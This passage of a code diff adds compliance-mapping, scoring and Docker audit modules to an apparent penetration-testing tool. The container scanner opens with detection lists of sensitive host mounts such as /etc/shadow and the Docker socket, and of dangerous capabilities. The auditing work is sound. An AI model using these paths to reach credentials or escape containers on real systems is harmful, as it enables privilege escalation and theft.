+  {
+    id: "CC7.1",
+    framework: "soc2",
+    category: "CC",
+    name: "System Boundaries",
+    description: "Entity uses boundary protection systems to protect against external threats",
+    priority: "critical",
+    keywords: ["firewall", "boundary", "perimeter", "network security"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Implement boundary protection controls",
+  },
+  {
+    id: "CC7.2",
+    framework: "soc2",
+    category: "CC",
+    name: "Anomaly Detection",
+    description: "Entity monitors system components and response to anomalies",
+    priority: "high",
+    keywords: ["monitoring", "anomaly", "detection", "alert"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "CC7.3",
+    framework: "soc2",
+    category: "CC",
+    name: "Security Event Evaluation",
+    description: "Entity evaluates security events to determine if they could impact objectives",
+    priority: "high",
+    keywords: ["security event", "evaluation", "incident", "analysis"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+  },
+  {
+    id: "CC7.4",
+    framework: "soc2",
+    category: "CC",
+    name: "Incident Response",
+    description: "Entity responds to identified security incidents",
+    priority: "critical",
+    keywords: ["incident response", "breach", "security incident", "containment"],
+    services: [],
+    severities: ["critical", "high"],
+    remediation: "Develop and test incident response procedures",
+  },
+  {
+    id: "CC7.5",
+    framework: "soc2",
+    category: "CC",
+    name: "Incident Recovery",
+    description: "Entity identifies, develops, and implements recovery activities",
+    priority: "high",
+    keywords: ["recovery", "restoration", "business continuity"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "CC8.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Change Management",
+    description: "Entity authorizes, designs, tests changes before implementation",
+    priority: "high",
+    keywords: ["change management", "testing", "authorization", "deployment"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+  {
+    id: "CC9.1",
+    framework: "soc2",
+    category: "CC",
+    name: "Risk Mitigation",
+    description: "Entity identifies, selects, and develops risk mitigation activities",
+    priority: "high",
+    keywords: ["risk mitigation", "remediation", "risk treatment"],
+    services: [],
+    severities: ["critical", "high", "medium"],
+  },
+  {
+    id: "CC9.2",
+    framework: "soc2",
+    category: "CC",
+    name: "Vendor Risk Management",
+    description: "Entity assesses and manages risks associated with vendors",
+    priority: "high",
+    keywords: ["vendor", "third party", "supplier", "risk management"],
+    services: [],
+    severities: [],
+  },
+
+  // Availability
+  {
+    id: "A1.1",
+    framework: "soc2",
+    category: "A",
+    name: "Capacity Management",
+    description: "Entity maintains, monitors capacity to meet availability commitments",
+    priority: "high",
+    keywords: ["capacity", "performance", "availability", "resources"],
+    services: [],
+    severities: [],
+  },
+  {
+    id: "A1.2",
+    framework: "soc2",
+    category: "A",
+    name: "Recovery Planning",
+    description: "Entity authorizes, implements, and tests recovery infrastructure",
+    priority: "high",
+    keywords: ["recovery", "backup", "disaster recovery", "business continuity"],
+    services: [],
+    severities: [],
+    remediation: "Implement and test recovery procedures",
+  },
+
+  // Processing Integrity
+  {
+    id: "PI1.1",
+    framework: "soc2",
+    category: "PI",
+    name: "Processing Policies",
+    description: "Entity obtains or generates, uses, and communicates relevant information",
+    priority: "medium",
+    keywords: ["processing", "data quality", "integrity"],
+    services: [],
+    severities: [],
+  },
+
+  // Confidentiality
+  {
+    id: "C1.1",
+    framework: "soc2",
+    category: "C",
+    name: "Confidential Information Identification",
+    description: "Entity identifies and maintains confidential information",
+    priority: "high",
+    keywords: ["confidential", "classification", "sensitive", "data"],
+    services: [],
+    severities: ["critical", "high"],
+  },
+  {
+    id: "C1.2",
+    framework: "soc2",
+    category: "C",
+    name: "Confidential Information Disposal",
+    description: "Entity disposes of confidential information to meet objectives",
+    priority: "high",
+    keywords: ["disposal", "destruction", "confidential", "sanitization"],
+    services: [],
+    severities: ["high", "medium"],
+  },
+
+  // Privacy
+  {
+    id: "P1.1",
+    framework: "soc2",
+    category: "P",
+    name: "Privacy Notice",
+    description: "Entity provides notice to data subjects about its privacy practices",
+    priority: "medium",
+    keywords: ["privacy", "notice", "disclosure", "data subject"],
+    services: [],
+    severities: [],
+  },
+]
diff --git a/packages/opencode/src/pentest/compliance/index.ts b/packages/opencode/src/pentest/compliance/index.ts
new file mode 100644
index 00000000000..3710a8b16f2
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/index.ts
@@ -0,0 +1,12 @@
+/**
+ * @fileoverview Compliance Module
+ *
+ * Exports compliance framework mapping and assessment functionality.
+ *
+ * @module pentest/compliance
+ */
+
+export { ComplianceTypes } from "./types"
+export { ComplianceFrameworks } from "./frameworks"
+export { ComplianceMapper } from "./mapper"
+export { ComplianceScorer } from "./scorer"
diff --git a/packages/opencode/src/pentest/compliance/mapper.ts b/packages/opencode/src/pentest/compliance/mapper.ts
new file mode 100644
index 00000000000..012d09e19ae
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/mapper.ts
@@ -0,0 +1,178 @@
+/**
+ * @fileoverview Compliance Mapper
+ *
+ * Auto-maps security findings to compliance framework controls.
+ *
+ * @module pentest/compliance/mapper
+ */
+
+import type { ComplianceTypes } from "./types"
+import type { PentestTypes } from "../types"
+import { ComplianceFrameworks } from "./frameworks"
+
+export namespace ComplianceMapper {
+  /**
+   * Map findings to controls for a specific framework.
+   *
+   * @param frameworkId - Framework to map against
+   * @param findings - Security findings to map
+   * @returns Array of finding-to-control mappings
+   */
+  export function mapFindings(
+    frameworkId: ComplianceTypes.FrameworkId,
+    findings: PentestTypes.Finding[]
+  ): ComplianceTypes.FindingControlMapping[] {
+    const controls = ComplianceFrameworks.getControls(frameworkId)
+    const mappings: ComplianceTypes.FindingControlMapping[] = []
+
+    for (const finding of findings) {
+      const mapping = mapFindingToControls(finding, controls)
+      if (mapping.controlIds.length > 0) {
+        mappings.push(mapping)
+      }
+    }
+
+    return mappings
+  }
+
+  /**
+   * Map a single finding to relevant controls.
+   */
+  function mapFindingToControls(
+    finding: PentestTypes.Finding,
+    controls: ComplianceTypes.ComplianceControl[]
+  ): ComplianceTypes.FindingControlMapping {
+    const matchedControls: Array<{ control: ComplianceTypes.ComplianceControl; score: number; reason: string }> = []
+
+    const findingText = `${finding.title} ${finding.description} ${finding.evidence || ""} ${finding.remediation || ""}`.toLowerCase()
+    const findingService = finding.service?.toLowerCase()
+
+    for (const control of controls) {
+      let score = 0
+      const reasons: string[] = []
+
+      // Check keyword matches
+      for (const keyword of control.keywords) {
+        if (findingText.includes(keyword.toLowerCase())) {
+          score += 10
+          reasons.push(`keyword:${keyword}`)
+        }
+      }
+
+      // Check service matches
+      if (findingService && control.services?.includes(findingService)) {
+        score += 15
+        reasons.push(`service:${findingService}`)
+      }
+
+      // Check severity alignment
+      if (control.severities?.includes(finding.severity)) {
+        score += 5
+        reasons.push(`severity:${finding.severity}`)
+      }
+
+      // Check CWE matches
+      if (finding.cve && control.cweIds) {
+        // Note: CVE and CWE are different, but often findings with CVEs
+        // map to controls with related CWEs via the finding description
+        for (const cweId of control.cweIds) {
+          if (findingText.includes(`cwe-${cweId}`) || findingText.includes(`cwe ${cweId}`)) {
+            score += 20
+            reasons.push(`cwe:${cweId}`)
+          }
+        }
+      }
+
+      // Boost score for title matches
+      const titleLower = finding.title.toLowerCase()
+      for (const keyword of control.keywords) {
+        if (titleLower.includes(keyword.toLowerCase())) {
+          score += 5 // Additional boost for title matches
+        }
+      }
+
+      if (score > 0) {
+        matchedControls.push({ control, score, reason: reasons.join(", ") })
+      }
+    }
+
+    // Sort by score and take top matches
+    matchedControls.sort((a, b) => b.score - a.score)
+    const topMatches = matchedControls.slice(0, 5)
+
+    // Determine confidence based on highest score
+    const maxScore = topMatches[0]?.score || 0
+    const confidence: "high" | "medium" | "low" = maxScore >= 25 ? "high" : maxScore >= 15 ? "medium" : "low"
+
+    return {
+      findingId: finding.id,
+      controlIds: topMatches.map((m) => m.control.id),
+      confidence,
+      matchReason: topMatches.map((m) => `${m.control.id}(${m.reason})`).join("; "),
+    }
+  }
+
+  /**
+   * Get controls that have findings mapped to them.
+   */
+  export function getControlsWithFindings(
+    frameworkId: ComplianceTypes.FrameworkId,
+    findings: PentestTypes.Finding[]
+  ): Map<string, string[]> {
+    const mappings = mapFindings(frameworkId, findings)
+    const controlToFindings = new Map<string, string[]>()
+
+    for (const mapping of mappings) {
+      for (const controlId of mapping.controlIds) {
+        const existing = controlToFindings.get(controlId) || []
+        if (!existing.includes(mapping.findingId)) {
+          existing.push(mapping.findingId)
+          controlToFindings.set(controlId, existing)
+        }
+      }
+    }
+
+    return controlToFindings
+  }
+
+  /**
+   * Get unmapped findings (findings that don't map to any control).
+   */
+  export function getUnmappedFindings(
+    frameworkId: ComplianceTypes.FrameworkId,
+    findings: PentestTypes.Finding[]
+  ): PentestTypes.Finding[] {
+    const mappings = mapFindings(frameworkId, findings)
+    const mappedIds = new Set(mappings.filter((m) => m.controlIds.length > 0).map((m) => m.findingId))
+
+    return findings.filter((f) => !mappedIds.has(f.id))
+  }
+
+  /**
+   * Get coverage statistics for a framework.
+   */
+  export function getCoverageStats(
+    frameworkId: ComplianceTypes.FrameworkId,
+    findings: PentestTypes.Finding[]
+  ): {
+    totalControls: number
+    controlsWithFindings: number
+    controlsWithoutFindings: number
+    coveragePercentage: number
+  } {
+    const controls = ComplianceFrameworks.getControls(frameworkId)
+    const controlsWithFindings = getControlsWithFindings(frameworkId, findings)
+
+    const totalControls = controls.length
+    const covered = controlsWithFindings.size
+    const uncovered = totalControls - covered
+    const percentage = totalControls > 0 ? Math.round((covered / totalControls) * 100) : 0
+
+    return {
+      totalControls,
+      controlsWithFindings: covered,
+      controlsWithoutFindings: uncovered,
+      coveragePercentage: percentage,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/compliance/scorer.ts b/packages/opencode/src/pentest/compliance/scorer.ts
new file mode 100644
index 00000000000..7bd023cf459
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/scorer.ts
@@ -0,0 +1,278 @@
+/**
+ * @fileoverview Compliance Scorer
+ *
+ * Calculates compliance scores based on findings and control assessments.
+ *
+ * @module pentest/compliance/scorer
+ */
+
+import type { ComplianceTypes } from "./types"
+import type { PentestTypes } from "../types"
+import { ComplianceFrameworks } from "./frameworks"
+import { ComplianceMapper } from "./mapper"
+
+export namespace ComplianceScorer {
+  /**
+   * Perform a full compliance assessment for a framework.
+   *
+   * @param frameworkId - Framework to assess
+   * @param findings - Security findings to evaluate
+   * @returns Complete compliance assessment
+   */
+  export async function assess(
+    frameworkId: ComplianceTypes.FrameworkId,
+    findings: PentestTypes.Finding[]
+  ): Promise<ComplianceTypes.ComplianceAssessment> {
+    const controls = ComplianceFrameworks.getControls(frameworkId)
+    const controlToFindings = ComplianceMapper.getControlsWithFindings(frameworkId, findings)
+
+    const controlAssessments: ComplianceTypes.ControlAssessment[] = []
+
+    for (const control of controls) {
+      const relatedFindingIds = controlToFindings.get(control.id) || []
+      const relatedFindings = findings.filter((f) => relatedFindingIds.includes(f.id))
+
+      const status = assessControlStatus(control, relatedFindings)
+
+      controlAssessments.push({
+        control,
+        status,
+        findings: relatedFindingIds,
+        notes: generateControlNotes(control, relatedFindings, status),
+      })
+    }
+
+    const score = calculateScore(controlAssessments)
+
+    return {
+      framework: frameworkId,
+      timestamp: Date.now(),
+      controls: controlAssessments,
+      score,
+    }
+  }
+
+  /**
+   * Assess status of a single control based on related findings.
+   */
+  function assessControlStatus(
+    control: ComplianceTypes.ComplianceControl,
+    findings: PentestTypes.Finding[]
+  ): ComplianceTypes.ControlStatus {
+    // If no findings relate to this control, it's not assessed
+    if (findings.length === 0) {
+      return "not_assessed"
+    }
+
+    // Filter to only open/confirmed findings (active issues)
+    const activeFindings = findings.filter((f) => f.status === "open" || f.status === "confirmed")
+
+    // If all findings are mitigated or false positives, control passes
+    if (activeFindings.length === 0) {
+      return "pass"
+    }
+
+    // Check severity of active findings
+    const hasCritical = activeFindings.some((f) => f.severity === "critical")
+    const hasHigh = activeFindings.some((f) => f.severity === "high")
+
+    // Critical or high severity findings = fail
+    if (hasCritical || hasHigh) {
+      return "fail"
+    }
+
+    // Medium severity = partial
+    const hasMedium = activeFindings.some((f) => f.severity === "medium")
+    if (hasMedium) {
+      return "partial"
+    }
+
+    // Low/info only = partial (not a complete failure)
+    return "partial"
+  }
+
+  /**
+   * Generate notes for a control assessment.
+   */
+  function generateControlNotes(
+    control: ComplianceTypes.ComplianceControl,
+    findings: PentestTypes.Finding[],
+    status: ComplianceTypes.ControlStatus
+  ): string {
+    if (status === "not_assessed") {
+      return "No related findings to assess this control."
+    }
+
+    if (status === "pass") {
+      if (findings.length === 0) {
+        return "No issues identified."
+      }
+      return `All ${findings.length} related finding(s) have been mitigated or marked as false positives.`
+    }
+
+    const activeFindings = findings.filter((f) => f.status === "open" || f.status === "confirmed")
+
+    if (status === "fail") {
+      const critical = activeFindings.filter((f) => f.severity === "critical").length
+      const high = activeFindings.filter((f) => f.severity === "high").length
+      return `${activeFindings.length} active finding(s): ${critical} critical, ${high} high severity. Immediate remediation required.`
+    }
+
+    // partial
+    const medium = activeFindings.filter((f) => f.severity === "medium").length
+    const low = activeFindings.filter((f) => f.severity === "low").length
+    return `${activeFindings.length} active finding(s): ${medium} medium, ${low} low severity. Review and remediate.`
+  }
+
+  /**
+   * Calculate overall compliance score.
+   */
+  function calculateScore(assessments: ComplianceTypes.ControlAssessment[]): ComplianceTypes.AssessmentScore {
+    const total = assessments.length
+    let passed = 0
+    let failed = 0
+    let partial = 0
+    let notAssessed = 0
+
+    for (const assessment of assessments) {
+      switch (assessment.status) {
+        case "pass":
+          passed++
+          break
+        case "fail":
+          failed++
+          break
+        case "partial":
+          partial++
+          break
+        case "not_assessed":
+          notAssessed++
+          break
+      }
+    }
+
+    // Calculate percentage based on assessed controls only
+    const assessed = total - notAssessed
+    // Partial counts as 0.5
+    const score = assessed > 0 ? passed + partial * 0.5 : 0
+    const percentage = assessed > 0 ? Math.round((score / assessed) * 100) : 100
+
+    return {
+      total,
+      passed,
+      failed,
+      partial,
+      notAssessed,
+      percentage,
+    }
+  }
+
+  /**
+   * Get a summary of compliance gaps.
+   */
+  export function getGapSummary(
+    assessment: ComplianceTypes.ComplianceAssessment
+  ): Array<{
+    controlId: string
+    controlName: string
+    category: string
+    status: ComplianceTypes.ControlStatus
+    priority: ComplianceTypes.ControlPriority
+    findingsCount: number
+  }> {
+    return assessment.controls
+      .filter((a) => a.status === "fail" || a.status === "partial")
+      .map((a) => ({
+        controlId: a.control.id,
+        controlName: a.control.name,
+        category: a.control.category,
+        status: a.status,
+        priority: a.control.priority,
+        findingsCount: a.findings.length,
+      }))
+      .sort((a, b) => {
+        // Sort by priority then by status (fail before partial)
+        const priorityOrder = { critical: 0, high: 1, medium: 2, low: 3 }
+        const statusOrder = { fail: 0, partial: 1 }
+        const pDiff = priorityOrder[a.priority] - priorityOrder[b.priority]
+        if (pDiff !== 0) return pDiff
+        return (statusOrder[a.status as "fail" | "partial"] || 0) - (statusOrder[b.status as "fail" | "partial"] || 0)
+      })
+  }
+
+  /**
+   * Get compliance score by category.
+   */
+  export function getScoreByCategory(
+    assessment: ComplianceTypes.ComplianceAssessment
+  ): Map<string, ComplianceTypes.AssessmentScore> {
+    const categories = new Map<string, ComplianceTypes.ControlAssessment[]>()
+
+    for (const control of assessment.controls) {
+      const cat = control.control.category
+      const existing = categories.get(cat) || []
+      existing.push(control)
+      categories.set(cat, existing)
+    }
+
+    const scores = new Map<string, ComplianceTypes.AssessmentScore>()
+
+    for (const [category, controls] of categories) {
+      scores.set(category, calculateScore(controls))
+    }
+
+    return scores
+  }
+
+  /**
+   * Compare two assessments to show progress.
+   */
+  export function compareAssessments(
+    previous: ComplianceTypes.ComplianceAssessment,
+    current: ComplianceTypes.ComplianceAssessment
+  ): {
+    scoreChange: number
+    newPasses: string[]
+    newFailures: string[]
+    improved: string[]
+    regressed: string[]
+  } {
+    const scoreChange = current.score.percentage - previous.score.percentage
+
+    const previousStatus = new Map(previous.controls.map((c) => [c.control.id, c.status]))
+    const currentStatus = new Map(current.controls.map((c) => [c.control.id, c.status]))
+
+    const newPasses: string[] = []
+    const newFailures: string[] = []
+    const improved: string[] = []
+    const regressed: string[] = []
+
+    for (const [controlId, status] of currentStatus) {
+      const prevStatus = previousStatus.get(controlId)
+
+      if (!prevStatus || prevStatus === "not_assessed") {
+        if (status === "pass") newPasses.push(controlId)
+        else if (status === "fail") newFailures.push(controlId)
+        continue
+      }
+
+      const statusRank = { pass: 3, partial: 2, fail: 1, not_assessed: 0 }
+      const prevRank = statusRank[prevStatus]
+      const currRank = statusRank[status]
+
+      if (currRank > prevRank) {
+        improved.push(controlId)
+      } else if (currRank < prevRank) {
+        regressed.push(controlId)
+      }
+    }
+
+    return {
+      scoreChange,
+      newPasses,
+      newFailures,
+      improved,
+      regressed,
+    }
+  }
+}
diff --git a/packages/opencode/src/pentest/compliance/types.ts b/packages/opencode/src/pentest/compliance/types.ts
new file mode 100644
index 00000000000..56c78f918a7
--- /dev/null
+++ b/packages/opencode/src/pentest/compliance/types.ts
@@ -0,0 +1,127 @@
+/**
+ * @fileoverview Compliance Type Definitions
+ *
+ * Zod schemas and types for compliance frameworks and assessments.
+ *
+ * @module pentest/compliance/types
+ */
+
+import z from "zod"
+
+export namespace ComplianceTypes {
+  /**
+   * Supported compliance frameworks.
+   */
+  export const FrameworkId = z.enum(["pci-dss", "hipaa", "soc2"])
+  export type FrameworkId = z.infer<typeof FrameworkId>
+
+  /**
+   * Control status in assessment.
+   */
+  export const ControlStatus = z.enum(["pass", "fail", "partial", "not_assessed"])
+  export type ControlStatus = z.infer<typeof ControlStatus>
+
+  /**
+   * Control priority/criticality.
+   */
+  export const ControlPriority = z.enum(["critical", "high", "medium", "low"])
+  export type ControlPriority = z.infer<typeof ControlPriority>
+
+  /**
+   * Compliance control definition.
+   */
+  export const ComplianceControl = z.object({
+    /** Unique control ID (e.g., "1.1.1" for PCI-DSS) */
+    id: z.string(),
+    /** Framework this control belongs to */
+    framework: FrameworkId,
+    /** Control category/requirement group */
+    category: z.string(),
+    /** Short control name */
+    name: z.string(),
+    /** Detailed control description */
+    description: z.string(),
+    /** Priority/criticality of this control */
+    priority: ControlPriority,
+    /** Keywords for auto-mapping findings */
+    keywords: z.array(z.string()),
+    /** Related CWE IDs */
+    cweIds: z.array(z.number()).optional(),
+    /** Related services (e.g., "ssh", "ftp") */
+    services: z.array(z.string()).optional(),
+    /** Severity levels that map to this control */
+    severities: z.array(z.enum(["critical", "high", "medium", "low", "info"])).optional(),
+    /** Remediation guidance */
+    remediation: z.string().optional(),
+    /** Reference documentation URL */
+    reference: z.string().optional(),
+  })
+  export type ComplianceControl = z.infer<typeof ComplianceControl>
+
+  /**
+   * Framework metadata.
+   */
+  export const Framework = z.object({
+    id: FrameworkId,
+    name: z.string(),
+    version: z.string(),
+    description: z.string(),
+    categories: z.array(
+      z.object({
+        id: z.string(),
+        name: z.string(),
+        description: z.string().optional(),
+      })
+    ),
+    controlCount: z.number(),
+  })
+  export type Framework = z.infer<typeof Framework>
+
+  /**
+   * Control assessment result.
+   */
+  export const ControlAssessment = z.object({
+    control: ComplianceControl,
+    status: ControlStatus,
+    /** Finding IDs that relate to this control */
+    findings: z.array(z.string()),
+    /** Assessment notes */
+    notes: z.string().optional(),
+  })
+  export type ControlAssessment = z.infer<typeof ControlAssessment>
+
+  /**
+   * Compliance assessment score.
+   */
+  export const AssessmentScore = z.object({
+    total: z.number(),
+    passed: z.number(),
+    failed: z.number(),
+    partial: z.number(),
+    notAssessed: z.number(),
+    percentage: z.number(),
+  })
+  export type AssessmentScore = z.infer<typeof AssessmentScore>
+
+  /**
+   * Complete compliance assessment.
+   */
+  export const ComplianceAssessment = z.object({
+    framework: FrameworkId,
+    timestamp: z.number(),
+    controls: z.array(ControlAssessment),
+    score: AssessmentScore,
+  })
+  export type ComplianceAssessment = z.infer<typeof ComplianceAssessment>
+
+  /**
+   * Finding to control mapping entry.
+   */
+  export const FindingControlMapping = z.object({
+    findingId: z.string(),
+    controlIds: z.array(z.string()),
+    confidence: z.enum(["high", "medium", "low"]),
+    matchReason: z.string(),
+  })
+  export type FindingControlMapping = z.infer<typeof FindingControlMapping>
+}
diff --git a/packages/opencode/src/pentest/containerscan/docker/config.ts b/packages/opencode/src/pentest/containerscan/docker/config.ts
new file mode 100644
index 00000000000..f6bdef9552b
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/docker/config.ts
@@ -0,0 +1,310 @@
+/**
+ * @fileoverview Docker Daemon Configuration Audit
+ *
+ * Analyzes Docker daemon configuration for security issues.
+ *
+ * @module pentest/containerscan/docker/config
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { readFile } from "fs/promises"
+import { Log } from "../../../util/log"
+import { ContainerScanTypes } from "../types"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.docker.config" })
+
+/**
+ * Docker config paths to check
+ */
+const CONFIG_PATHS = ["/etc/docker/daemon.json", "/etc/default/docker", "/etc/sysconfig/docker"]
+
+/**
+ * Docker Daemon Config namespace
+ */
+export namespace DockerConfig {
+  /**
+   * Get Docker daemon info
+   */
+  export async function getDaemonInfo(): Promise<Record<string, unknown>> {
+    try {
+      const { stdout } = await execAsync("docker info --format '{{json .}}'")
+      return JSON.parse(stdout)
+    } catch (error) {
+      log.error("Failed to get Docker daemon info", { error })
+      throw new Error(`Failed to get Docker info: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Get Docker daemon configuration
+   */
+  export async function getConfig(): Promise<ContainerScanTypes.DockerDaemonConfig> {
+    const info = await getDaemonInfo()
+
+    // Try to read daemon.json
+    let daemonJson: Record<string, unknown> = {}
+    for (const path of CONFIG_PATHS) {
+      try {
+        const content = await readFile(path, "utf-8")
+        daemonJson = JSON.parse(content)
+        break
+      } catch {
+        continue
+      }
+    }
+
+    // Parse security features
+    const securityOptions = (info.SecurityOptions || []) as string[]
+
+    return {
+      tlsEnabled: !!(info.ID && String(info.ID).includes("tls")),
+      tlsVerify: !!daemonJson["tls-verify"],
+      authzPlugins: (daemonJson["authorization-plugins"] as string[]) || [],
+      logDriver: (info.LoggingDriver as string) || (daemonJson["log-driver"] as string),
+      storageDriver: info.Driver as string,
+      userlandProxy: daemonJson["userland-proxy"] !== false,
+      liveRestore: (info.LiveRestoreEnabled as boolean) || (daemonJson["live-restore"] as boolean),
+      usernsRemap: (info.UsernsMode as string) || (daemonJson["userns-remap"] as string),
+      seccompProfile: securityOptions.find((o) => o.includes("seccomp"))?.split("=")[1],
+      noNewPrivileges: securityOptions.some((o) => o.includes("no-new-privileges")),
+      icc: daemonJson["icc"] !== false,
+    }
+  }
+
+  /**
+   * Audit Docker daemon configuration
+   */
+  export async function audit(): Promise<ContainerScanTypes.ContainerFinding[]> {
+    const findings: ContainerScanTypes.ContainerFinding[] = []
+
+    try {
+      const config = await getConfig()
+      const info = await getDaemonInfo()
+
+      // Check TLS configuration
+      if (!config.tlsVerify) {
+        findings.push(createFinding(
+          "high",
+          "Docker Daemon TLS Not Verified",
+          "Docker daemon is not configured to verify TLS certificates. This could allow MITM attacks.",
+          "Enable TLS verification in daemon.json with 'tlsverify': true"
+        ))
+      }
+
+      // Check authorization plugins
+      if (config.authzPlugins.length === 0) {
+        findings.push(createFinding(
+          "medium",
+          "No Authorization Plugin Configured",
+          "Docker daemon has no authorization plugins, relying only on socket access for authorization.",
+          "Consider implementing an authorization plugin for fine-grained access control"
+        ))
+      }
+
+      // Check userland proxy
+      if (config.userlandProxy) {
+        findings.push(createFinding(
+          "low",
+          "Userland Proxy Enabled",
+          "Docker userland proxy is enabled. Consider disabling for better performance and security.",
+          "Set 'userland-proxy': false in daemon.json"
+        ))
+      }
+
+      // Check live restore
+      if (!config.liveRestore) {
+        findings.push(createFinding(
+          "low",
+          "Live Restore Not Enabled",
+          "Docker live restore is not enabled. Containers will stop on daemon restart.",
+          "Set 'live-restore': true in daemon.json for container availability during daemon updates"
+        ))
+      }
+
+      // Check user namespace remapping
+      if (!config.usernsRemap) {
+        findings.push(createFinding(
+          "medium",
+          "User Namespace Remapping Not Enabled",
+          "Docker is not using user namespace remapping. Container root maps to host root.",
+          "Enable user namespace remapping with 'userns-remap' in daemon.json"
+        ))
+      }
+
+      // Check seccomp profile
+      if (!config.seccompProfile || config.seccompProfile === "unconfined") {
+        findings.push(createFinding(
+          "medium",
+          "Default Seccomp Profile Not Applied",
+          "Docker daemon may not be applying the default seccomp profile to containers.",
+          "Ensure seccomp is enabled and using default or custom profile"
+        ))
+      }
+
+      // Check no-new-privileges
+      if (!config.noNewPrivileges) {
+        findings.push(createFinding(
+          "medium",
+          "No-New-Privileges Not Default",
+          "Docker daemon is not configured with no-new-privileges as default.",
+          "Add 'no-new-privileges': true to default security options"
+        ))
+      }
+
+      // Check inter-container communication
+      if (config.icc) {
+        findings.push(createFinding(
+          "medium",
+          "Inter-Container Communication Enabled",
+          "All containers on the default bridge network can communicate with each other.",
+          "Set 'icc': false in daemon.json and use explicit network links"
+        ))
+      }
+
+      // Check storage driver
+      const insecureDrivers = ["vfs", "devicemapper"]
+      if (config.storageDriver && insecureDrivers.includes(config.storageDriver)) {
+        findings.push(createFinding(
+          "medium",
+          `Suboptimal Storage Driver: ${config.storageDriver}`,
+          `Docker is using ${config.storageDriver} storage driver which may have performance or security issues.`,
+          "Consider using overlay2 storage driver for better performance and security"
+        ))
+      }
+
+      // Check for insecure registries
+      const insecureRegistries = (info["RegistryConfig"] as Record<string, unknown>)?.["InsecureRegistryCIDRs"] as string[]
+      if (insecureRegistries && insecureRegistries.length > 0) {
+        findings.push(createFinding(
+          "high",
+          "Insecure Registries Configured",
+          `Docker daemon is configured to allow insecure registries: ${insecureRegistries.join(", ")}`,
+          "Remove insecure registries and use TLS for all registry connections"
+        ))
+      }
+
+      // Check for debug mode
+      if (info.Debug) {
+        findings.push(createFinding(
+          "medium",
+          "Docker Debug Mode Enabled",
+          "Docker daemon is running in debug mode, which may expose sensitive information.",
+          "Disable debug mode in production by removing 'debug': true from daemon.json"
+        ))
+      }
+
+      // Check API version
+      const apiVersion = info.ServerVersion as string
+      if (apiVersion && compareVersions(apiVersion, "20.10.0") < 0) {
+        findings.push(createFinding(
+          "high",
+          `Outdated Docker Version: ${apiVersion}`,
+          "Docker version is outdated and may have known security vulnerabilities.",
+          "Update Docker to the latest stable version"
+        ))
+      }
+
+      log.info("Docker daemon audit complete", { findingsCount: findings.length })
+      return findings
+    } catch (error) {
+      log.error("Docker daemon audit failed", { error })
+      throw error
+    }
+  }
+
+  /**
+   * Get Docker version
+   */
+  export async function getVersion(): Promise<{
+    client: string
+    server: string
+    apiVersion: string
+  }> {
+    try {
+      const { stdout } = await execAsync("docker version --format '{{json .}}'")
+      const data = JSON.parse(stdout)
+      return {
+        client: data.Client?.Version || "unknown",
+        server: data.Server?.Version || "unknown",
+        apiVersion: data.Client?.APIVersion || "unknown",
+      }
+    } catch (error) {
+      throw new Error(`Failed to get Docker version: ${error instanceof Error ? error.message : String(error)}`)
+    }
+  }
+
+  /**
+   * Check if Docker socket is exposed
+   */
+  export async function checkSocketExposure(): Promise<{
+    exposed: boolean
+    path: string
+    permissions: string
+  }> {
+    try {
+      const socketPath = "/var/run/docker.sock"
+      const { stdout } = await execAsync(`ls -la ${socketPath}`)
+      const permissions = stdout.split(/\s+/)[0]
+
+      // Check if socket is world-readable or writable
+      const exposed = permissions.includes("w", 7) || permissions.includes("r", 7)
+
+      return {
+        exposed,
+        path: socketPath,
+        permissions,
+      }
+    } catch {
+      return {
+        exposed: false,
+        path: "/var/run/docker.sock",
+        permissions: "unknown",
+      }
+    }
+  }
+
+  /**
+   * Create a finding
+   */
+  function createFinding(
+    severity: ContainerScanTypes.Severity,
+    title: string,
+    description: string,
+    remediation: string
+  ): ContainerScanTypes.ContainerFinding {
+    return {
+      id: `docker-daemon-${Date.now()}-${Math.random().toString(36).slice(2, 8)}`,
+      category: "misconfiguration",
+      severity,
+      title,
+      description,
+      resource: {
+        type: "daemon",
+        name: "docker",
+      },
+      remediation,
+      compliance: [
+        { framework: "cis-docker", control: "Daemon Configuration" },
+      ],
+      detectedAt: Date.now(),
+    }
+  }
+
+  /**
+   * Compare version strings
+   */
+  function compareVersions(v1: string, v2: string): number {
+    const parts1 = v1.split(".").map((p) => parseInt(p, 10) || 0)
+    const parts2 = v2.split(".").map((p) => parseInt(p, 10) || 0)
+
+    for (let i = 0; i < Math.max(parts1.length, parts2.length); i++) {
+      const p1 = parts1[i] || 0
+      const p2 = parts2[i] || 0
+      if (p1 !== p2) return p1 - p2
+    }
+
+    return 0
+  }
+}
diff --git a/packages/opencode/src/pentest/containerscan/docker/containers.ts b/packages/opencode/src/pentest/containerscan/docker/containers.ts
new file mode 100644
index 00000000000..a4b9fbe99ef
--- /dev/null
+++ b/packages/opencode/src/pentest/containerscan/docker/containers.ts
@@ -0,0 +1,468 @@
+/**
+ * @fileoverview Docker Container Scanner
+ *
+ * Analyzes running Docker containers for security issues.
+ *
+ * @module pentest/containerscan/docker/containers
+ */
+
+import { exec } from "child_process"
+import { promisify } from "util"
+import { Log } from "../../../util/log"
+import { Bus } from "../../../bus"
+import { ContainerScanTypes } from "../types"
+import { ContainerScanEvents } from "../events"
+
+const execAsync = promisify(exec)
+const log = Log.create({ service: "pentest.containerscan.docker.containers" })
+
+/**
+ * Sensitive mount paths that should be flagged
+ */
+const SENSITIVE_MOUNTS = [
+  "/",
+  "/etc",
+  "/etc/shadow",
+  "/etc/passwd",
+  "/root",
+  "/var/run/docker.sock",
+  "/proc",
+  "/sys",
+  "/dev",
+  "/boot",
+]
+
+/**
+ * Dangerous capabilities
+ */
+const DANGEROUS_CAPABILITIES = [
+  "SYS_ADMIN",
+  "NET_ADMIN",
